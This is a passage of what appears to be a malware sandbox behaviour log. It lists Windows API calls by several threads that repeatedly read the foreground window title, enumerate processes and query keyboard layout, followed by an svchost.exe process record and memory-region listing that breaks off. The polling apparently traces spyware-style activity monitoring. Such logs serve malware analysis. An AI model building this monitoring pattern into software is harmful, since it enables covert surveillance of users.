[0213.760] GetForegroundWindow () returned 0x100d4
[0213.761] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.973] GetForegroundWindow () returned 0x2007c
[0213.973] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0214.086] GetForegroundWindow () returned 0x2007c
[0214.086] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0214.209] GetForegroundWindow () returned 0x2007c
[0214.210] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0214.335] GetForegroundWindow () returned 0x2007c
[0214.335] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0215.478] GetForegroundWindow () returned 0x50032
[0215.497] GetWindowThreadProcessId (in: hWnd=0x50032, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0215.498] EnumProcesses (in: lpidProcess=0x256a6b0, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x256a6b0, lpcbNeeded=0x51cf97c) returned 1
[0215.507] GetLastError () returned 0x3e5
[0215.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x350e8c0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x350e8c0, ResultLength=0x51cf940*=0x17620) returned 0x0
[0215.520] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0215.520] GetWindowTextW (in: hWnd=0x50032, lpString=0x6979b8, nMaxCount=256 | out: lpString="Shut Down Windows") returned 17
[0215.985] GetForegroundWindow () returned 0x10316
[0215.985] GetWindowTextW (in: hWnd=0x10316, lpString=0x6979b8, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.116] GetForegroundWindow () returned 0x10316
[0216.116] GetWindowTextW (in: hWnd=0x10316, lpString=0x6979b8, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.300] GetForegroundWindow () returned 0x10316
[0216.301] GetWindowTextW (in: hWnd=0x10316, lpString=0x6979b8, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0218.601] GetForegroundWindow () returned 0x0
[0218.602] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0218.602] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.298] GetForegroundWindow () returned 0x0
[0219.299] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.585] GetForegroundWindow () returned 0x0
[0219.585] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.753] GetForegroundWindow () returned 0x0
[0219.753] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0219.936] GetForegroundWindow () returned 0x0
[0219.937] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0220.222] GetForegroundWindow () returned 0x0
[0220.222] GetWindowTextW (in: hWnd=0x0, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0221.712] GetForegroundWindow () returned 0x100d4
[0221.712] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
Thread:
id = 137
os_tid = 0x1d0
Thread:
id = 138
os_tid = 0x13f4
[0204.512] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.598] GetForegroundWindow () returned 0x2007c
[0204.600] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0204.601] GetForegroundWindow () returned 0x2007c
[0204.601] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0204.808] GetForegroundWindow () returned 0x2007c
[0204.808] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0204.810] GetForegroundWindow () returned 0x2007c
[0204.811] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0205.224] GetForegroundWindow () returned 0x100d4
[0205.224] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0205.224] EnumProcesses (in: lpidProcess=0x24e1b30, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x24e1b30, lpcbNeeded=0x556f8fc) returned 1
[0205.232] GetLastError () returned 0x0
[0205.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34ee8a0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x34ee8a0, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0205.240] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0205.240] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0205.415] GetForegroundWindow () returned 0x2007c
[0205.415] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0205.752] GetForegroundWindow () returned 0x2007c
[0205.752] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0205.926] GetForegroundWindow () returned 0x2007c
[0205.926] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x6ac
[0205.926] EnumProcesses (in: lpidProcess=0x256ca20, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x256ca20, lpcbNeeded=0x556f8fc) returned 1
[0205.928] GetLastError () returned 0x0
[0205.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x354e900, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x354e900, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0205.940] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0205.942] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0206.142] GetForegroundWindow () returned 0x2007c
[0206.142] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0206.384] GetForegroundWindow () returned 0x100d4
[0206.385] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0206.385] EnumProcesses (in: lpidProcess=0x25a02e8, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x25a02e8, lpcbNeeded=0x556f8fc) returned 1
[0206.428] GetLastError () returned 0x0
[0206.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x356eb40, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x356eb40, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0206.606] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0206.607] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0207.102] GetForegroundWindow () returned 0x2007c
[0207.103] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0211.877] GetForegroundWindow () returned 0x2007c
[0211.878] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0211.990] GetForegroundWindow () returned 0x2007c
[0211.990] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.131] GetForegroundWindow () returned 0x2007c
[0212.132] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.281] GetForegroundWindow () returned 0x100d4
[0212.282] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0212.429] GetForegroundWindow () returned 0x2007c
[0212.429] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.605] GetForegroundWindow () returned 0x2007c
[0212.606] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.733] GetForegroundWindow () returned 0x2007c
[0212.733] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0212.933] GetForegroundWindow () returned 0x2007c
[0212.933] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.067] GetForegroundWindow () returned 0x100d4
[0213.068] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.215] GetForegroundWindow () returned 0x2007c
[0213.215] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.335] GetForegroundWindow () returned 0x2007c
[0213.335] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.459] GetForegroundWindow () returned 0x2007c
[0213.459] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.583] GetForegroundWindow () returned 0x2007c
[0213.583] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0213.647] GetForegroundWindow () returned 0x100d4
[0213.647] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0213.648] EnumProcesses (in: lpidProcess=0x26bbe10, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x26bbe10, lpcbNeeded=0x556f8fc) returned 1
[0213.660] GetLastError () returned 0x0
[0213.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3476de0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x3476de0, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0213.714] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0213.716] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0213.821] GetForegroundWindow () returned 0x2007c
[0213.821] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x6ac
[0213.822] EnumProcesses (in: lpidProcess=0x251e6ac, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x251e6ac, lpcbNeeded=0x556f8fc) returned 1
[0213.829] GetLastError () returned 0x1e7
[0213.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3496e00, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x3496e00, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0213.838] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0213.839] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.025] GetForegroundWindow () returned 0x2007c
[0214.025] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.146] GetForegroundWindow () returned 0x2007c
[0214.146] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.272] GetForegroundWindow () returned 0x2007c
[0214.273] GetWindowTextW (in: hWnd=0x2007c, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0214.399] GetForegroundWindow () returned 0x100d4
[0214.399] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0214.399] EnumProcesses (in: lpidProcess=0x2544edc, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x2544edc, lpcbNeeded=0x556f8fc) returned 1
[0214.521] GetLastError () returned 0x1e7
[0214.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34ee8a0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x34ee8a0, ResultLength=0x556f8c0*=0x174e0) returned 0x0
[0214.532] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0214.532] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
[0215.787] GetForegroundWindow () returned 0x10316
[0215.787] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x1298
[0215.787] EnumProcesses (in: lpidProcess=0x25904c8, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x25904c8, lpcbNeeded=0x556f8fc) returned 1
[0215.803] GetLastError () returned 0x1e7
[0215.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x352e8e0, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x352e8e0, ResultLength=0x556f8c0*=0x17620) returned 0x0
[0215.818] GetKeyboardLayout (idThread=0x1298) returned 0x4090409
[0215.818] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.058] GetForegroundWindow () returned 0x10316
[0216.058] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.227] GetForegroundWindow () returned 0x10316
[0216.227] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0216.411] GetForegroundWindow () returned 0x10316
[0216.411] GetWindowTextW (in: hWnd=0x10316, lpString=0x69f450, nMaxCount=256 | out: lpString="Finger Raise") returned 12
[0219.032] GetForegroundWindow () returned 0x0
[0219.032] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0219.447] GetForegroundWindow () returned 0x0
[0219.447] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0219.648] GetForegroundWindow () returned 0x0
[0219.648] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0219.846] GetForegroundWindow () returned 0x0
[0219.846] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0220.084] GetForegroundWindow () returned 0x0
[0220.084] GetWindowTextW (in: hWnd=0x0, lpString=0x69f450, nMaxCount=256 | out: lpString="") returned 0
[0221.371] GetForegroundWindow () returned 0x100d4
[0221.371] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x556f944 | out: lpdwProcessId=0x556f944) returned 0x668
[0221.371] EnumProcesses (in: lpidProcess=0x25ba50c, cb=0x400, lpcbNeeded=0x556f8fc | out: lpidProcess=0x25ba50c, lpcbNeeded=0x556f8fc) returned 1
[0221.387] GetLastError () returned 0x578
[0221.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x354e900, Length=0x20000, ResultLength=0x556f8c0 | out: SystemInformation=0x354e900, ResultLength=0x556f8c0*=0x11c38) returned 0x0
[0221.403] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0221.404] GetWindowTextW (in: hWnd=0x100d4, lpString=0x69f450, nMaxCount=256 | out: lpString="FolderView") returned 10
Thread:
id = 139
os_tid = 0xa24
[0204.559] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.644] GetForegroundWindow () returned 0x2007c
[0204.644] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0207.119] GetForegroundWindow () returned 0x2007c
[0207.121] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0207.312] GetForegroundWindow () returned 0x2007c
[0207.313] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0207.671] GetForegroundWindow () returned 0x2007c
[0207.671] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x56af8c4 | out: lpdwProcessId=0x56af8c4) returned 0x6ac
[0207.671] EnumProcesses (in: lpidProcess=0x2616424, cb=0x400, lpcbNeeded=0x56af87c | out: lpidProcess=0x2616424, lpcbNeeded=0x56af87c) returned 1
[0207.678] GetLastError () returned 0x0
[0207.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35ceba0, Length=0x20000, ResultLength=0x56af840 | out: SystemInformation=0x35ceba0, ResultLength=0x56af840*=0x174e0) returned 0x0
[0207.691] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0207.691] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0208.930] GetForegroundWindow () returned 0x100d4
[0208.930] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x56af8c4 | out: lpdwProcessId=0x56af8c4) returned 0x668
[0208.930] EnumProcesses (in: lpidProcess=0x2536644, cb=0x400, lpcbNeeded=0x56af87c | out: lpidProcess=0x2536644, lpcbNeeded=0x56af87c) returned 1
[0208.934] GetLastError () returned 0x0
[0208.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x366fc50, Length=0x20000, ResultLength=0x56af840 | out: SystemInformation=0x366fc50, ResultLength=0x56af840*=0x174e0) returned 0x0
[0208.959] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0208.960] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a3d28, nMaxCount=256 | out: lpString="FolderView") returned 10
[0209.142] GetForegroundWindow () returned 0x2007c
[0209.150] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0209.321] GetForegroundWindow () returned 0x2007c
[0209.321] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0209.420] GetForegroundWindow () returned 0x2007c
[0209.424] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0210.142] GetForegroundWindow () returned 0x2007c
[0210.143] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0210.591] GetForegroundWindow () returned 0x100d4
[0210.591] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a3d28, nMaxCount=256 | out: lpString="FolderView") returned 10
[0210.750] GetForegroundWindow () returned 0x2007c
[0210.750] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0210.928] GetForegroundWindow () returned 0x2007c
[0210.928] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0211.111] GetForegroundWindow () returned 0x2007c
[0211.111] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0211.403] GetForegroundWindow () returned 0x2007c
[0211.403] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a3d28, nMaxCount=256 | out: lpString="") returned 0
[0211.633] GetForegroundWindow () returned 0x100d4
[0211.634] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a3d28, nMaxCount=256 | out: lpString="FolderView") returned 10
Thread:
id = 140
os_tid = 0xd98
[0204.647] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.652] GetForegroundWindow () returned 0x2007c
[0204.653] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0207.095] GetForegroundWindow () returned 0x2007c
[0207.098] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0207.731] GetForegroundWindow () returned 0x2007c
[0207.732] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0207.877] GetForegroundWindow () returned 0x2007c
[0207.877] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0208.037] GetForegroundWindow () returned 0x100d4
[0208.037] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x668
[0208.038] EnumProcesses (in: lpidProcess=0x263dde0, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x263dde0, lpcbNeeded=0x58ef7fc) returned 1
[0208.051] GetLastError () returned 0x0
[0208.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35eebc0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x35eebc0, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0208.175] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0208.183] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a4a78, nMaxCount=256 | out: lpString="FolderView") returned 10
[0208.385] GetForegroundWindow () returned 0x2007c
[0208.386] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0208.589] GetForegroundWindow () returned 0x2007c
[0208.589] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0209.249] GetForegroundWindow () returned 0x2007c
[0209.284] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0210.058] GetForegroundWindow () returned 0x2007c
[0210.058] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0210.498] GetForegroundWindow () returned 0x100d4
[0210.498] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x668
[0210.498] EnumProcesses (in: lpidProcess=0x25871f0, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25871f0, lpcbNeeded=0x58ef7fc) returned 1
[0210.514] GetLastError () returned 0x0
[0210.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x36cfcb0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x36cfcb0, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0210.537] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0210.538] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a4a78, nMaxCount=256 | out: lpString="FolderView") returned 10
[0210.650] GetForegroundWindow () returned 0x2007c
[0210.650] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x6ac
[0210.650] EnumProcesses (in: lpidProcess=0x25acd24, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25acd24, lpcbNeeded=0x58ef7fc) returned 1
[0210.657] GetLastError () returned 0x0
[0210.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x36efcd0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x36efcd0, ResultLength=0x58ef7c0*=0x17520) returned 0x0
[0210.670] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0210.671] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0210.853] GetForegroundWindow () returned 0x2007c
[0210.853] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0211.022] GetForegroundWindow () returned 0x2007c
[0211.022] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0211.198] GetForegroundWindow () returned 0x2007c
[0211.198] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
[0211.465] GetForegroundWindow () returned 0x100d4
[0211.465] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x668
[0211.466] EnumProcesses (in: lpidProcess=0x25d71e8, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25d71e8, lpcbNeeded=0x58ef7fc) returned 1
[0211.477] GetLastError () returned 0x0
[0211.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370fcf0, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x370fcf0, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0211.595] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0211.597] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6a4a78, nMaxCount=256 | out: lpString="FolderView") returned 10
[0211.727] GetForegroundWindow () returned 0x2007c
[0211.741] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x58ef844 | out: lpdwProcessId=0x58ef844) returned 0x6ac
[0211.744] EnumProcesses (in: lpidProcess=0x25fd2d0, cb=0x400, lpcbNeeded=0x58ef7fc | out: lpidProcess=0x25fd2d0, lpcbNeeded=0x58ef7fc) returned 1
[0211.768] GetLastError () returned 0x0
[0211.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x372fd10, Length=0x20000, ResultLength=0x58ef7c0 | out: SystemInformation=0x372fd10, ResultLength=0x58ef7c0*=0x174e0) returned 0x0
[0211.793] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0211.794] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6a4a78, nMaxCount=256 | out: lpString="") returned 0
Thread:
id = 141
os_tid = 0xde0
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x757f8000"
os_pid = "0x370"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "4"
os_parent_pid = "0x214"
cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bf3c" [0xc000000f], "LOCAL" [0x7]
Region:
id = 1662
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1663
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1664
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1665
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1666
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1667
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1668
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1669
start_va = 0x100000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1670
start_va = 0x180000
end_va = 0x186fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1671
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1672
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 1673
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1674
start_va = 0x1c0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1675
start_va = 0x1e0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1676
start_va = 0x200000
end_va = 0x3fffff
